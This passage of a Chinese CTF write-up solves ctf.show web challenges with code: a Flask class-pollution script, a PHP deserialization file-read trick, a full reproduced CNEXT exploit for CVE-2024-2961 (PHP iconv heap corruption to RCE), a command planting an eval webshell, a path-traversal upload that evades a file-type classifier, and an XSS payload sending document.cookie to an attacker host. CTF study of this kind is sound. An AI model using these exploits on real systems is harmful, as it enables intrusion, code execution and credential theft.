urllib3 # 禁用 SSL 警告 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Target URL url = "https://ecafef8b-ca58-4907-ad5a-1286528121bb.challenge.ctf.show/" # Keys escaping (绕过黑名单) k_class = "\\u005f\\u005fclass\\u005f\\u005f" k_init = "\\u005f\\u005f\\u0069nit\\u005f\\u005f" k_globals = "\\u005f\\u005f\\u0067lobals\\u005f\\u005f" k_app = "\\u0061pp" k_secret_key = "secret\\u005fkey" k_jinja_env = "jinja\\u005f\\u0065nv" # env 被过滤 k_variable_start_string = "variable\\u005fstart\\u005fs\\u0074ring" # string 被过滤 k_variable_end_string = "variable\\u005fend\\u005fs\\u0074ring" k_cache = "c\u0061che" k_session = "session" k_username = "username" k_password = "password" # Payload Construction payload_str = f''' {{ "{k_class}": {{ "{k_init}": {{ "{k_globals}": {{ "{k_app}": {{ "{k_secret_key}": "123", "{k_jinja_env}": {{ "{k_variable_start_string}": "[#", "{k_variable_end_string}": "#]", "{k_cache}": null }} }}, "{k_session}": {{ "{k_username}": "adminer", "{k_password}": "123" }} }} }} }} }} ''' headers = { "Content-Type": "text/plain" # 避免 Flask 自动解析为 json 对象，保持 request.data 为原始数据 } s = requests.Session() print("Sending exploit...") # 必须 verify=False 因为远程证书有问题 response = s.post(url, data=payload_str, headers=headers, verify=False) print(f"Status Code: {response.status_code}") print(f"Response Text: {response.text}") # Step 2: Access /admin print("Accessing /admin...") response_admin = s.get(url + "admin", verify=False) print(f"Admin Status Code: {response_admin.status_code}") print(f"Admin Response Text: {response_admin.text}") </code></pre> <h2>Ezzz_php</h2> <p><img src="./../../../public/pcb5-ez_java/image-20251224210059541-1766670360263-11.png" alt="image-20251224210059541" /></p> <pre><code>&lt;?php highlight_file(__FILE__); error_reporting(0); function substrstr($data) { $start = mb_strpos($data, "["); $end = mb_strpos($data, "]"); return mb_substr($data, $start + 1, $end - 1 - $start); } class read_file{ public $start; public $filename="/etc/passwd"; public function __construct($start){ $this-&gt;start=$start; } public function __destruct(){ if($this-&gt;start == "gxngxngxn"){ echo 'What you are reading is:'.file_get_contents($this-&gt;filename); } } } if(isset($_GET['start'])){ $readfile = new read_file($_GET['start']); $read=isset($_GET['read'])?$_GET['read']:"I_want_to_Read_flag"; if(preg_match("/\[|\]/i", $_GET['read'])){ die("NONONO!!!"); } $ctf = substrstr($read."[".serialize($readfile)."]"); unserialize($ctf); }else{ echo "Start_Funny_CTF!!!"; } Start_Funny_CTF!!! </code></pre> <p>先start读取</p> <pre><code>?start=gxngxngxn </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251224203744893-1766670360263-12.png" alt="image-20251224203744893" /></p> <p>先本地生成一个</p> <pre><code>&lt;?php highlight_file(__FILE__); error_reporting(0); function substrstr($data) { $start = mb_strpos($data, "["); echo $start.'&lt;br&gt;'; $end = mb_strpos($data, "]"); echo $end.'&lt;br&gt;'; return mb_substr($data, $start, $end + 1 - $start); } $key = substrstr($_GET[0]."[welcome".$_GET[1]."sdpcsec]"); echo $key; class read_file{ public $start; public $filename="/etc/passwd"; public function __construct($start){ $this-&gt;start=$start; } public function __destruct(){ if($this-&gt;start == "gxngxngxn"){ echo 'What you are reading is:'.file_get_contents($this-&gt;filename); } } } $readfile=new read_file("aaaaaaa"); echo serialize($readfile); /*O:9:"read_file":2:{s:5:"start";s:7:"aaaaaaa";s:8:"filename";s:11:"/etc/passwd";} </code></pre> <p>由于只有<code>$read</code>所以我们要选择前移的参数<code>%9f</code></p> <pre><code>highlight_file(__FILE__); error_reporting(0); function substrstr($data) { $start = mb_strpos($data, "["); $end = mb_strpos($data, "]"); return mb_substr($data, $start + 1, $end - 1 - $start); } class read_file { public $start; public $filename = "/etc/passwd"; public function __construct($start) { $this-&gt;start = $start; } public function __destruct() { if ($this-&gt;start == "gxngxngxn") { echo 'What you are reading is:' . file_get_contents($this-&gt;filename); } } } if (isset($_GET['start'])) { $readfile = new read_file($_GET['start']); $read = isset($_GET['read']) ? $_GET['read'] : "I_want_to_Read_flag"; if (preg_match("/\[|\]/i", $_GET['read'])) { die("NONONO!!!"); } $ctf = substrstr($read . "[" . serialize($readfile) . "]"); unserialize($ctf); echo $ctf; } else { echo "Start_Funny_CTF!!!"; } </code></pre> <p>这里可以echo测试，注意，拼接上去的字符串不能有<code>[</code></p> <p><img src="./../../../public/pcb5-ez_java/image-20251224204419132-1766670360263-13.png" alt="image-20251224204419132" /></p> <p>其中其中需要的%9f即为<strong>后面字符串的长度+1。</strong></p> <p><img src="./../../../public/pcb5-ez_java/image-20251224151912780-1766670360263-14.png" alt="image-20251224151912780" /></p> <pre><code>?start=aaaaaaaa&amp;read=%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9fO:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:10:"/etc/hosts";} </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251224210246328-1766670360263-15.png" alt="image-20251224210246328" /></p> <p>然后任意文件读取变为RCE，这里是<strong>CVE-2024-2961</strong></p> <p>原poc<a href="https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py">cnext-exploits/cnext-exploit.py at main · ambionics/cnext-exploits</a></p> <p>命令执行<a href="https://github.com/vulhub/vulhub/blob/master/php/CVE-2024-2961/README.zh-cn.md">vulhub/php/CVE-2024-2961/README.zh-cn.md at master · vulhub/vulhub</a></p> <p>其中修改的地方</p> <pre><code>def send(self, path: str) -&gt; Response: payload_file = 'O:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:' + str( len(path)) + ':"' + path + '";}' payload = "%9f" * (len(payload_file) + 1) + payload_file.replace("+", "%2b") filename_len = "a" * (len(path) + 10) url = self.url + f"?start={filename_len}&amp;read={payload}" return self.session.get(url) def download(self, path: str) -&gt; bytes: """Returns the contents of a remote file. """ path = f"php://filter/convert.base64-encode/resource={path}" response = self.send(path) data = response.re.search(b"What you are reading is:(.*)", flags=re.S).group(1) return base64.decode(data) </code></pre> <p>运行：</p> <pre><code>#!/usr/bin/env python3 # # CNEXT: PHP file-read to RCE # Date: 2024-05-27 # Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS) # # TODO Parse LIBC to know if patched # # INFORMATIONS # # To use, implement the Remote class, which tells the exploit how to send the payload. # # REQUIREMENTS # # Requires ten: https://github.com/cfreal/ten # from __future__ import annotations import base64 import zlib from dataclasses import dataclass from pwn import * from requests.exceptions import ChunkedEncodingError, ConnectionError from ten import * HEAP_SIZE = 2 * 1024 * 1024 BUG = "劄".encode("utf-8") class Remote: """A helper class to send the payload and download files. The logic of the exploit is always the same, but the exploit needs to know how to download files (/proc/self/maps and libc) and how to send the payload. The code here serves as an example that attacks a page that looks like: ```php &lt;?php $data = file_get_contents($_POST['file']); echo "File contents: $data"; ``` Tweak it to fit your target, and start the exploit. """ def __init__(self, url: str) -&gt; None: self.url = url self.session = Session() def send(self, path: str) -&gt; Response: """Sends given `path` to the HTTP server. Returns the response. """ payload_file = 'O:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:' + str(len(path)) + ':"' + path + '";}' payload = "%9f" * (len(payload_file) + 1) + payload_file.replace("+","%2b") filename_len = "a" * (len(path) + 10) url = self.url+f"?start={filename_len}&amp;read={payload}" return self.session.get(url) def download(self, path: str) -&gt; bytes: """Returns the contents of a remote file. """ path = f"php://filter/convert.base64-encode/resource={path}" response = self.send(path) data = response.re.search(b"What you are reading is:(.*)", flags=re.S).group(1) return base64.decode(data) @entry @arg("url", "Target URL") @arg("command", "Command to run on the system; limited to 0x140 bytes") @arg("sleep_time", "Time to sleep to assert that the exploit worked. By default, 1.") @arg("heap", "Address of the main zend_mm_heap structure.") @arg( "pad", "Number of 0x100 chunks to pad with. If the website makes a lot of heap " "operations with this size, increase this. Defaults to 20.", ) @dataclass class Exploit: """CNEXT exploit: RCE using a file read primitive in PHP.""" url: str command: str sleep: int = 1 heap: str = None pad: int = 20 def __post_init__(self): self.remote = Remote(self.url) self.log = logger("EXPLOIT") self.info = {} self.heap = self.heap and int(self.heap, 16) def check_vulnerable(self) -&gt; None: """Checks whether the target is reachable and properly allows for the various wrappers and filters that the exploit needs. """ def safe_download(path: str) -&gt; bytes: try: return self.remote.download(path) except ConnectionError: failure("Target not [b]reachable[/] ?") def check_token(text: str, path: str) -&gt; bool: result = safe_download(path) return text.encode() == result text = tf.random.string(50).encode() base64 = b64(text, misalign=True).decode() path = f"data:text/plain;base64,{base64}" result = safe_download(path) if text not in result: msg_failure("Remote.download did not return the test string") print("--------------------") print(f"Expected test string: {text}") print(f"Got: {result}") print("--------------------") failure("If your code works fine, it means that the [i]data://[/] wrapper does not work") msg_info("The [i]data://[/] wrapper works") text = tf.random.string(50) base64 = b64(text.encode(), misalign=True).decode() path = f"php://filter//resource=data:text/plain;base64,{base64}" if not check_token(text, path): failure("The [i]php://filter/[/] wrapper does not work") msg_info("The [i]php://filter/[/] wrapper works") text = tf.random.string(50) base64 = b64(compress(text.encode()), misalign=True).decode() path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}" if not check_token(text, path): failure("The [i]zlib[/] extension is not enabled") msg_info("The [i]zlib[/] extension is enabled") msg_success("Exploit preconditions are satisfied") def get_file(self, path: str) -&gt; bytes: with msg_status(f"Downloading [i]{path}[/]..."): return self.remote.download(path) def get_regions(self) -&gt; list[Region]: """Obtains the memory regions of the PHP process by querying /proc/self/maps.""" maps = self.get_file("/proc/self/maps") maps = maps.decode() PATTERN = re.compile( r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)" ) regions = [] for region in table.split(maps, strip=True): if match := PATTERN.match(region): start = int(match.group(1), 16) stop = int(match.group(2), 16) permissions = match.group(3) path = match.group(4) if "/" in path or "[" in path: path = path.rsplit(" ", 1)[-1] else: path = "" current = Region(start, stop, permissions, path) regions.append(current) else: print(maps) failure("Unable to parse memory mappings") self.log.info(f"Got {len(regions)} memory regions") return regions def get_symbols_and_addresses(self) -&gt; None: """Obtains useful symbols and addresses from the file read primitive.""" regions = self.get_regions() LIBC_FILE = "/dev/shm/cnext-libc" # PHP's heap self.info["heap"] = self.heap or self.find_main_heap(regions) # Libc libc = self._get_region(regions, "libc-", "libc.so") self.download_file(libc.path, LIBC_FILE) self.info["libc"] = ELF(LIBC_FILE, checksec=False) self.info["libc"].address = libc.start def _get_region(self, regions: list[Region], *names: str) -&gt; Region: """Returns the first region whose name matches one of the given names.""" for region in regions: if any(name in region.path for name in names): break else: failure("Unable to locate region") return region def download_file(self, remote_path: str, local_path: str) -&gt; None: """Downloads `remote_path` to `local_path`""" data = self.get_file(remote_path) Path(local_path).write(data) def find_main_heap(self, regions: list[Region]) -&gt; Region: # Any anonymous RW region with a size superior to the base heap size is a # candidate. The heap is at the bottom of the region. heaps = [ region.stop - HEAP_SIZE + 0x40 for region in reversed(regions) if region.permissions == "rw-p" and region.size &gt;= HEAP_SIZE and region.stop &amp; (HEAP_SIZE - 1) == 0 and region.path == "" ] if not heaps: failure("Unable to find PHP's main heap in memory") first = heaps[0] if len(heaps) &gt; 1: heaps = ", ".join(map(hex, heaps)) msg_info(f"Potential heaps: [i]{heaps}[/] (using first)") else: msg_info(f"Using [i]{hex(first)}[/] as heap") return first def run(self) -&gt; None: self.check_vulnerable() self.get_symbols_and_addresses() self.exploit() def build_exploit_path(self) -&gt; str: """ On each step of the exploit, a filter will process each chunk one after the other. Processing generally involves making some kind of operation either on the chunk or in a destination chunk of the same size. Each operation is applied on every single chunk; you cannot make PHP apply iconv on the first 10 chunks and leave the rest in place. That's where the difficulties come from. Keep in mind that we know the address of the main heap, and the libraries. ASLR/PIE do not matter here. The idea is to use the bug to make the freelist for chunks of size 0x100 point lower. For instance, we have the following free list: ... -&gt; 0x7fffAABBCC900 -&gt; 0x7fffAABBCCA00 -&gt; 0x7fffAABBCCB00 By triggering the bug from chunk ..900, we get: ... -&gt; 0x7fffAABBCCA00 -&gt; 0x7fffAABBCCB48 -&gt; ??? That's step 3. Now, in order to control the free list, and make it point whereever we want, we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so, we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48. That's step 2. Now, if we were to perform step2 an then step3 without anything else, we'd have a problem: after step2 has been processed, the free list goes bottom-up, like: 0x7fffAABBCCB00 -&gt; 0x7fffAABBCCA00 -&gt; 0x7fffAABBCC900 We need to go the other way around. That's why we have step 1: it just allocates chunks. When they get freed, they reverse the free list. Now step2 allocates in reverse order, and therefore after step2, chunks are in the correct order. Another problem comes up. To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT. Since step2 creates chunks that contain pointers and pointers are generally not UTF-8, we cannot afford to have that conversion happen on the chunks of step2. To avoid this, we put the chunks in step2 at the very end of the chain, and prefix them with `0\n`. When dechunked (right before the iconv), they will "disappear" from the chain, preserving them from the character set conversion and saving us from an unwanted processing error that would stop the processing chain. After step3 we have a corrupted freelist with an arbitrary pointer into it. We don't know the precise layout of the heap, but we know that at the top of the heap resides a zend_mm_heap structure. We overwrite this structure in two ways. Its free_slot[] array contains a pointer to each free list. By overwriting it, we can make PHP allocate chunks whereever we want. In addition, its custom_heap field contains pointers to hook functions for emalloc, efree, and erealloc (similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and then overwrite the use_custom_heap flag to make PHP use these function pointers instead. We can now do our favorite CTF technique and get a call to system(&lt;chunk&gt;). We make sure that the "system" command kills the current process to avoid other system() calls with random chunk data, leading to undefined behaviour. The pad blocks just "pad" our allocations so that even if the heap of the process is in a random state, we still get contiguous, in order chunks for our exploit. Therefore, the whole process described here CANNOT crash. Everything falls perfectly in place, and nothing can get in the middle of our allocations. """ LIBC = self.info["libc"] ADDR_EMALLOC = LIBC.symbols["__libc_malloc"] ADDR_EFREE = LIBC.symbols["__libc_system"] ADDR_EREALLOC = LIBC.symbols["__libc_realloc"] ADDR_HEAP = self.info["heap"] ADDR_FREE_SLOT = ADDR_HEAP + 0x20 ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168 ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10 CS = 0x100 # Pad needs to stay at size 0x100 at every step pad_size = CS - 0x18 pad = b"\x00" * pad_size pad = chunked_chunk(pad, len(pad) + 6) pad = chunked_chunk(pad, len(pad) + 6) pad = chunked_chunk(pad, len(pad) + 6) pad = compressed_bucket(pad) step1_size = 1 step1 = b"\x00" * step1_size step1 = chunked_chunk(step1) step1 = chunked_chunk(step1) step1 = chunked_chunk(step1, CS) step1 = compressed_bucket(step1) # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash" step2_size = 0x48 step2 = b"\x00" * (step2_size + 8) step2 = chunked_chunk(step2, CS) step2 = chunked_chunk(step2) step2 = compressed_bucket(step2) step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN) step2_write_ptr = chunked_chunk(step2_write_ptr, CS) step2_write_ptr = chunked_chunk(step2_write_ptr) step2_write_ptr = compressed_bucket(step2_write_ptr) step3_size = CS step3 = b"\x00" * step3_size assert len(step3) == CS step3 = chunked_chunk(step3) step3 = chunked_chunk(step3) step3 = chunked_chunk(step3) step3 = compressed_bucket(step3) step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG assert len(step3_overflow) == CS step3_overflow = chunked_chunk(step3_overflow) step3_overflow = chunked_chunk(step3_overflow) step3_overflow = chunked_chunk(step3_overflow) step3_overflow = compressed_bucket(step3_overflow) step4_size = CS step4 = b"=00" + b"\x00" * (step4_size - 1) step4 = chunked_chunk(step4) step4 = chunked_chunk(step4) step4 = chunked_chunk(step4) step4 = compressed_bucket(step4) # This chunk will eventually overwrite mm_heap-&gt;free_slot # it is actually allocated 0x10 bytes BEFORE it, thus the two filler values step4_pwn = ptr_bucket( 0x200000, 0, # free_slot 0, 0, ADDR_CUSTOM_HEAP, # 0x18 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ADDR_HEAP, # 0x140 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, size=CS, ) step4_custom_heap = ptr_bucket( ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18 ) step4_use_custom_heap_size = 0x140 COMMAND = self.command COMMAND = f"kill -9 $PPID; {COMMAND}" if self.sleep: COMMAND = f"sleep {self.sleep}; {COMMAND}" COMMAND = COMMAND.encode() + b"\x00" assert ( len(COMMAND) &lt;= step4_use_custom_heap_size ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}" COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00") step4_use_custom_heap = COMMAND step4_use_custom_heap = qpe(step4_use_custom_heap) step4_use_custom_heap = chunked_chunk(step4_use_custom_heap) step4_use_custom_heap = chunked_chunk(step4_use_custom_heap) step4_use_custom_heap = chunked_chunk(step4_use_custom_heap) step4_use_custom_heap = compressed_bucket(step4_use_custom_heap) pages = ( step4 * 3 + step4_pwn + step4_custom_heap + step4_use_custom_heap + step3_overflow + pad * self.pad + step1 * 3 + step2_write_ptr + step2 * 2 ) resource = compress(compress(pages)) resource = b64(resource) resource = f"data:text/plain;base64,{resource.decode()}" filters = [ # Create buckets "zlib.inflate", "zlib.inflate", # Step 0: Setup heap "dechunk", "convert.iconv.latin1.latin1", # Step 1: Reverse FL order "dechunk", "convert.iconv.latin1.latin1", # Step 2: Put fake pointer and make FL order back to normal "dechunk", "convert.iconv.latin1.latin1", # Step 3: Trigger overflow "dechunk", "convert.iconv.UTF-8.ISO-2022-CN-EXT", # Step 4: Allocate at arbitrary address and change zend_mm_heap "convert.quoted-printable-decode", "convert.iconv.latin1.latin1", ] filters = "|".join(filters) path = f"php://filter/read={filters}/resource={resource}" return path @inform("Triggering...") def exploit(self) -&gt; None: path = self.build_exploit_path() start = time.time() try: self.remote.send(path) except (ConnectionError, ChunkedEncodingError): pass msg_print() if not self.sleep: msg_print(" [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]") elif start + self.sleep &lt;= time.time(): msg_print(" [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]") else: # Wrong heap, maybe? If the exploited suggested others, use them! msg_print(" [b white on black] EXPLOIT [/][b white on red] FAILURE [/]") msg_print() def compress(data) -&gt; bytes: """Returns data suitable for `zlib.inflate`. """ # Remove 2-byte header and 4-byte checksum return zlib.compress(data, 9)[2:-4] def b64(data: bytes, misalign=True) -&gt; bytes: payload = base64.encode(data) if not misalign and payload.endswith("="): raise ValueError(f"Misaligned: {data}") return payload.encode() def compressed_bucket(data: bytes) -&gt; bytes: """Returns a chunk of size 0x8000 that, when dechunked, returns the data.""" return chunked_chunk(data, 0x8000) def qpe(data: bytes) -&gt; bytes: """Emulates quoted-printable-encode. """ return "".join(f"={x:02x}" for x in data).upper().encode() def ptr_bucket(*ptrs, size=None) -&gt; bytes: """Creates a 0x8000 chunk that reveals pointers after every step has been ran.""" if size is not None: assert len(ptrs) * 8 == size bucket = b"".join(map(p64, ptrs)) bucket = qpe(bucket) bucket = chunked_chunk(bucket) bucket = chunked_chunk(bucket) bucket = chunked_chunk(bucket) bucket = compressed_bucket(bucket) return bucket def chunked_chunk(data: bytes, size: int = None) -&gt; bytes: """Constructs a chunked representation of the given chunk. If size is given, the chunked representation has size `size`. For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`. """ # The caller does not care about the size: let's just add 8, which is more than # enough if size is None: size = len(data) + 8 keep = len(data) + len(b"\n\n") size = f"{len(data):x}".rjust(size - keep, "0") return size.encode() + b"\n" + data + b"\n" @dataclass class Region: """A memory region.""" start: int stop: int permissions: str path: str @property def size(self) -&gt; int: return self.stop - self.start Exploit() </code></pre> <p>python3 exp.py url "echo '&lt;?=@eval($_POST[0]);?&gt;' &gt; 1.php"</p> <p><img src="./../../../public/pcb5-ez_java/image-20251224161823739-1766565671041-1-1766621306808-1-1766670360263-17.png" alt="image-20251224161823739" /></p> <p>ctfshow{105c9b5a-5bd3-4f6d-aa53-3d6763df9f98}</p> <p>其中mb_strpos与mb_substr执行差异黄河流域也考过，也是同一师傅出题</p> <h2>NewerFileDetector</h2> <p>这题目代码审计给我审爽了啊</p> <p>这里给了bot.py和app.py，审计代码</p> <p>bot.py</p> <pre><code>from selenium import webdriver import time import os # bot nodejs puppter selenium flag = os.getenv("flag") if os.getenv("flag") is not None else "flag{test}" option = webdriver.ChromeOptions() option.add_argument('--headless') option.add_argument('--no-sandbox') option.add_argument('--disable-logging') option.add_argument('--disable-dev-shm-usage') browser = webdriver.Chrome(options=option) cookie = {'name': 'flag', 'value': flag, 'domain':'localhost','httpOnly': False} def visit(link): try: browser.get("http://localhost:5050/check") #检测是否为vip browser.add_cookie(cookie) page_source = browser.page_source print(page_source) if "VIP" not in page_source: return "NONONO" # pass print(cookie) url = "http://localhost:5050/share?file=" + link if ".." in url: return "Get out!" browser.get(url) time.sleep(1) browser.quit() print("success") return "OK" except Exception as e: print(e) return "you broke the server,get out!" </code></pre> <p>审计bot.py，发现bot行为是先通过check检测是否为VIP，是的话访问http://localhost:5050/share?file={link}，其中cookie的domain设置为了localhost，也就是只有本地访问才能拿到flag，其中httpOnly，表示可以直接通过xss的document.cookie拿到flag</p> <p>先分点：</p> <ul> <li>覆盖vip.json使check为vip</li> <li>magika代码审计</li> <li>xss得到flag</li> </ul> <p>app.py</p> <pre><code>from flask import Flask,request,session import magika import uuid import json import os from bot import visit as bot_visit import ast app = Flask(__name__) app.secret_key = str(uuid.uuid4()) app.static_folder = 'public/' vip_user = "vip" vip_pwd = str(uuid.uuid4()) curr_dir = os.path.dirname(os.path.abspath(__file__)) CHECK_FOLDER = os.path.join(curr_dir,"check") USER_FOLDER = os.path.join(curr_dir,"public/user") mg = magika.Magika() #深度学习 def isSecure(file_type): D_extns = ["json",'py','sh', "html"] if file_type in D_extns: return False return True @app.route("/login",methods=['GET','POST']) def login(): if session.get("isSVIP"): return "logined" if request.method == "GET": return "input your username and password plz" elif request.method == "POST": try: user = request.form.get("username").strip() pwd = request.form.get("password").strip() if user == vip_user and pwd == vip_pwd: session["isSVIP"] = "True" else: session["isSVIP"] = "False" # 写入硬盘中，方便bot验证。 file = os.path.join(CHECK_FOLDER,"vip.json") with open(file,"w") as f: json.dump({k: v for k, v in session.items()},f) f.close() return f"{user} login success" except: return "you broke the server,get out!" @app.route("/upload",methods = ["POST"]) def upload(): try: content = request.form.get("content").strip() name = request.form.get("name").strip() file_type = mg.identify_bytes(content.encode()).output.ct_label #判断文件内容 if isSecure(file_type): file = os.path.join(USER_FOLDER,name) with open(file,"w") as f: f.write(content) f.close() return "ok,share your link to bot: /visit?link=user/"+ name return "black!" except: return "you broke the server,fuck out!" @app.route('/') def index(): return app.send_static_file('index.html') @app.route('/visit') def visit(): link = request.args.get("link") return bot_visit(link) @app.route('/share') def share(): file = request.args.get("file") return app.send_static_file(file) @app.route("/clear",methods=['GET']) def clear(): session.clear() return "session clear success" @app.route("/check",methods=['GET']) def check(): path = os.path.join(CHECK_FOLDER,"vip.json") #join if os.path.exists(path): content = open(path,"r").read() try: isSVIP = ast.literal_eval(json.loads(content)["isSVIP"]) except: isSVIP = False return "VIP" if isSVIP else "GUEST" else: return "GUEST" if __name__ == "__main__": app.run("0.0.0.0",5050) </code></pre> <p>/check路由作用是读取vip.json的内容并判断是否为VIP</p> <pre><code>@app.route("/check",methods=['GET']) def check(): path = os.path.join(CHECK_FOLDER,"vip.json") #join if os.path.exists(path): content = open(path,"r").read() try: isSVIP = ast.literal_eval(json.loads(content)["isSVIP"]) except: isSVIP = False return "VIP" if isSVIP else "GUEST" else: return "GUEST" </code></pre> <p>我们查看/login路由</p> <pre><code>@app.route("/login",methods=['GET','POST']) def login(): if session.get("isSVIP"): return "logined" if request.method == "GET": return "input your username and password plz" elif request.method == "POST": try: user = request.form.get("username").strip() pwd = request.form.get("password").strip() if user == vip_user and pwd == vip_pwd: session["isSVIP"] = "True" else: session["isSVIP"] = "False" # 写入硬盘中，方便bot验证。 file = os.path.join(CHECK_FOLDER,"vip.json") with open(file,"w") as f: json.dump({k: v for k, v in session.items()},f) f.close() return f"{user} login success" except: return "you broke the server,get out!" </code></pre> <p>登录成功后会将isSVIP的session值写入/app/check/vip.json，但是vip_pwd未知，始终为False</p> <p>我们接着看/upload路由</p> <pre><code>@app.route("/upload",methods = ["POST"]) def upload(): try: content = request.form.get("content").strip() name = request.form.get("name").strip() file_type = mg.identify_bytes(content.encode()).output.ct_label #判断文件内容 if isSecure(file_type): file = os.path.join(USER_FOLDER,name) with open(file,"w") as f: f.write(content) f.close() return "ok,share your link to bot: /visit?link=user/"+ name return "black!" except: return "you broke the server,fuck out!" </code></pre> <p>这里name可控，我们可以通过../将绝对路径上传变成任意文件上传，从而将/app/check/vip.json覆盖掉。但是这里对上传的content有限制，通过大模型identify_bytes检测后若预测值不是["json",'py','sh', "html"] 即可上传文件。</p> <p>这里我们跟进identify_bytes</p> <p><img src="./../../../public/pcb5-ez_java/image-20251225203758347-1766670360263-18.png" alt="image-20251225203758347" /></p> <p>我们注意到，若是上传的内容长度小于_min_file_size_for_dl，则会调用_get_result_of_few_bytes，跟进_get_result_of_few_bytes</p> <p><img src="./../../../public/pcb5-ez_java/image-20251225203953152-1766670360263-16.png" alt="image-20251225203953152" /></p> <p>发现返回的是 ContentType.GENERIC_TEXT，硬编码也就是txt</p> <p>我们接着跟进_min_file_size_for_dl</p> <p><img src="./../../../public/pcb5-ez_java/image-20251225204106672-1766670360263-19.png" alt="image-20251225204106672" /></p> <p>发现这里是访问/config/magika_config.json，我们打开</p> <p><img src="./../../../public/pcb5-ez_java/image-20251225204147778-1766670360264-20.png" alt="image-20251225204147778" /></p> <p>"min_file_size_for_dl": 16</p> <p>也就是上传的content内容小于16即可绕过黑名单，使返回的为txt</p> <p>我们回到/login路由，session["isSVIP"] = "True"，所以我们得构造{"isSVIP":"True"}覆盖掉/app/check/vip.json</p> <p>但是这里正好为17，magika会预测这里为json</p> <p>我们继续查看/check路由</p> <pre><code> if os.path.exists(path): content = open(path,"r").read() try: isSVIP = ast.literal_eval(json.loads(content)["isSVIP"]) except: isSVIP = False return "VIP" if isSVIP else "GUEST" else: return "GUEST" </code></pre> <p>其中return "VIP" if isSVIP else "GUEST"，也就是如果isSVIP为True，即值为1也可以通过这个判断</p> <p>我们上传{"isSVIP":"1"}绕过magika 的检测，同时让 ast.literal_eval 判定为 SVIP</p> <p>我们访问upload路由</p> <pre><code>/upload POST: name=../../../check/vip.json&amp;content={"isSVIP":"1"} </code></pre> <p>我们查看/check路由，可以看到返回了VIP</p> <p><img src="./../../../public/pcb5-ez_java/image-20251225205117184-1766670360264-22.png" alt="image-20251225205117184" /></p> <p>我们上传一个html让bot访问该网页，触发xss将cookie传出</p> <pre><code>/upload POST: name=1.html&amp;content={script}fetch("http://your-ip:9999/?flag="+document.cookie){/script} </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251225205926846-1766670360264-21.png" alt="image-20251225205926846" /></p> <p>我们访问/visit?link=user/1.html</p> <p>在vps上python3 -m http.server 9999</p> <p><img src="./../../../public/pcb5-ez_java/image-20251224221424520-1766670360264-23.png" alt="image-20251224221424520" /></p> <p>得到flag:</p> <p>ctfshow{63ad0925-ecd0-4d6e-8ca8-7691c40cc3cb}</p> <h2>SendMessage</h2> <p>这题官方wp没看懂咋触发的，我们直接打</p> <p>● 使用nc和C程序交互，C程序和内网的web程序交互</p> <p>● 内网的web是tp8.0</p> <p>● 内网的web主控制器Index 会从共享内存获取数据</p> <p>● C程序可以往共享内存写入数据</p> <p>● C程序和web程序使用同一个共享内存(写入错误格式，web报500错误来判断)</p> <p>而php在处理共享内存跨进程通讯时，如果内存里面的内容可控，会直接触发反序列化操作</p> <pre><code>from pwn import * import time #Author: ctfshow/h1xa #Description: read flag from /f* address = "pwn.challenge.ctf.show" port = 28202 data = 